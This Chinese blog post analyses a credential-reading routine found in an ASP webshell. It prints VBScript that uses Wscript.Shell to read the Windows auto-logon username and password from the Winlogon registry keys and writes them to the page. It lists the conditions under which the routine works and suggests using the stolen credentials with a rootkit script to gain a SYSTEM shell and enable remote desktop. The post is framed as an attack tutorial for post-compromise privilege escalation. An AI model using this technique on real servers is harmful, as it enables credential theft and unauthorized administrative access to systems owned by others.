对asp马儿直接读取管理密码的分析

admin

0x0  前言

今天看贴吧，看到一篇提权的文章(http://tieba.baidu.com/p/4585912079?share=9105&fr=share)，楼主说，asp马儿直接读取到了管理员密码！当时很不可思议，怎么会直接读取到了呢？然后去T00LS问了问，后来自己也找了一个不灭之魂的asp马儿做了分析！

0x1  读取密码的代码

//如下：

Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName") Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword") Response.Write "<li type=square>用户名:"&Admin&"<br>" Response.Write "<li type=square>密码:"&Passwd&"<br>"

可以看到这些代码的意思就是读取管理员的账号和密码，并且打印出来！

于是，我们就可以拿到了管理员的账号密码！

那么大马是用什么方式读取注册表的呢：

set wsh=createobject("Wscript.Shell")

用wscript.Shell来操作的！

0x2  适用条件

看完了以后，肯定有人疑问,如果我说的是真的，那不就不用提权了馬？其实不然，这里要强调一下适用条件：

-->>>T00ls的大表哥给出的<<<--

>>webshell的权限比较大：帖子的测试环境是network service！

>>Wscript.Shell未禁用！(个人观点)

>>服务器启用了用户自动登陆(启用方法：http://wenku.baidu.com/view/6f28b64f2e3f5727a5e96227.html)

0x3  问题解决

如果读取了管理密码，人家3389没开呢？我们可以用rootkit脚本，然后用管理员账号密码登陆，然后获得一个system权限的cmdshell来开启3389！

from:http://www.admintony.top/?p=55